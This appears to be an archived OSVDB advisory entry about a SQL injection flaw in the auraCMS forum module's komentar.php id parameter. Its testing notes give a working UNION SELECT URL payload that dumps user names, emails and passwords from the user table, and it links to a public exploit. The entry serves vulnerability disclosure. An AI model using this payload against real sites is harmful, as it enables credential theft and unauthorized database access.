auraCMS Modul Forum komentar.php id Variable SQL Injection

2007-08-05T00:00:00
ID OSVDB:36432
Type osvdb
Reporter k1tk4t (k1k4t@newhack.org)
Modified 2007-08-05T00:00:00

Description

Manual Testing Notes

http://[target]/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/*

References:

Secunia Advisory ID: 26332
ISS X-Force ID: 35814
Generic Exploit URL: http://milw0rm.com/exploits/4254
CVE-2007-4171
Bugtraq ID: 25202